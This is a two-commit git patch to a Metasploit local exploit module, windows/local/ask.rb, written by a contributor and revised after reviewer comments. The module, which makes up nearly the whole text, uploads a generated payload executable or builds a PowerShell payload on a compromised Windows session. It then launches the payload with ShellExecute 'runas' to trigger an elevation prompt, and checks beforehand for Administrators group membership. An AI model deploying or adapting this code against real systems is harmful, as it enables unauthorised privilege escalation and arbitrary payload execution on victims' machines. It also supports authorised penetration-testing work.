From 6881774c0305f12129b8b948107f6683fe721568 Mon Sep 17 00:00:00 2001 From: b00stfr3ak Date: Sun, 20 Oct 2013 01:15:51 -0700 Subject: [PATCH 1/2] Updated with comments from jlee-r7 and Meatballs1 Added fail_with instead of just print_error figured a way to execute the cmd_psh_payload with out using gsub added case statment for datastore['TECHNIQUE'] --- modules/exploits/windows/local/ask.rb | 69 ++++++++++----------------- 1 file changed, 25 insertions(+), 44 deletions(-) diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 163f62edde..2fbc6cc300 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -42,14 +42,13 @@ class Metasploit3 < Msf::Exploit::Local register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), - OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]), + OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]), OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), ]) end def exploit - root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA') @@ -63,56 +62,38 @@ class Metasploit3 < Msf::Exploit::Local uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') case uac_level.data - when 2 - print_status "UAC is set to 'Always Notify'" - print_status "The user will be prompted, wait for them to click 'Ok'" - when 5 - print_debug "UAC is set to Default" - print_debug "The user will be prompted, wait for them to click 'Ok'" - when 0 - print_good "UAC is not enabled, no prompt for the user" + when 2 + print_status "UAC is set to 'Always Notify'" + print_status "The user will be prompted, wait for them to click 'Ok'" + when 5 + print_debug "UAC is set to Default" + print_debug "The user will be prompted, wait for them to click 'Ok'" + when 0 + print_good "UAC is not enabled, no prompt for the user" end - # # Generate payload and random names for upload # - - if datastore["TECHNIQUE"] == "EXE" - if datastore["UPLOAD"] - exe_payload = generate_exe_payload_exe - - if datastore["FILENAME"] - payload_filename = datastore["FILENAME"] - else - payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - end - - if datastore["PATH"] - payload_path = datastore["PATH"] - else - payload_path = session.fs.file.expand_path("%TEMP%") - end - + case datastore["TECHNIQUE"] + when "EXE" + exe_payload = generate_payload_exe + payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + payload_path = datastore["PATH"] || expand_path("%TEMP%") cmd_location = "#{payload_path}\\#{payload_filename}" - if datastore["UPLOAD"] print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") - fd = session.fs.file.new(cmd_location, "wb") - fd.write(exe_payload) - fd.close + write_file(cmd_location, exe_payload) + else + #print_error("No Upload Path!") + fail_with(Exploit::Failure::BadConfig, "No Upload Path!") + return end - - session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) - else - print_error("No Upload Path!") - return - end - else - command = cmd_psh_payload(payload.encoded) - arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","") - session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5) + command, args = cmd_location,nil + session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) + when "PSH" + command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}" end + session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) end -end - +end \ No newline at end of file From 9695b2d66283bdff7f68ad4ab37ecbde0e494e2a Mon Sep 17 00:00:00 2001 From: b00stfr3ak Date: Mon, 21 Oct 2013 11:57:50 -0700 Subject: [PATCH 2/2] Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. --- modules/exploits/windows/local/ask.rb | 29 +++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 2fbc6cc300..ab8c24bb16 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -48,7 +48,36 @@ class Metasploit3 < Msf::Exploit::Local end + def check + session.readline + print_status('Checking admin status...') + whoami = session.sys.process.execute('cmd /c whoami /groups', + nil, + {'Hidden' => true, 'Channelized' => true} + ) + cmdout = [] + while(cmdoutput = whoami.channel.read) + cmdout << cmdoutput + end + if cmdout.size == 0 + fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute") + else + isinadmins = cmdout.join.scan(/S-1-5-32-544/) + if isinadmins.size > 0 + print_good('Part of Administrators group! Continuing...') + return Exploit::CheckCode::Vulnerable + else + print_error('Not in admins group, cannot escalate with this module') + print_error('Exiting...') + return Exploit::CheckCode::Safe + end + end + end def exploit + admin_check = check + if admin_check.join =~ /safe/ + return Exploit::CheckCode::Safe + end root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA')